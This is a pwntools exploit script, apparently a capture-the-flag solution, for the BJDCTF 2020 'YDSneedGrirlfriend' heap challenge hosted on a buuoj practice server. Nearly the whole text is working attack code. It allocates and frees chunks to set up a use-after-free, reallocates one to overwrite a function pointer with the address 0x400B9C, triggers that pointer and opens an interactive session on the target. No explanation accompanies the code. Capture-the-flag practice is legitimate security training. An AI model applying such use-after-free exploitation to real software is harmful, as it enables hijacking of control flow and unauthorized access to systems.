bjdctf_2020_YDSneedGrirlfriend

exp

from pwn import *

#p = process('./bjdctf_2020_YDSneedGrirlfriend')
p = remote('node3.buuoj.cn',27389)
context.binary = './bjdctf_2020_YDSneedGrirlfriend'
elf = ELF('./bjdctf_2020_YDSneedGrirlfriend')
libc = elf.libc
context.log_level = 'debug'

def add(size,name):
    p.sendafter('Your choice :',str(1))
    p.sendafter('Her name size is :',str(size))
    p.sendafter('Her name is :',name)

def delete(idx):
    p.sendafter('Your choice :',str(2))
    p.sendafter('Index :',str(idx))

add(0x10,'aaaa')
add(0x20,'bbbb')
add(0x30,'cccc')
delete(0)
delete(1)

add(0x10,p64(0x400B9C))
p.sendafter('Your choice :',str(3))


#gdb.attach(p)



p.interactive()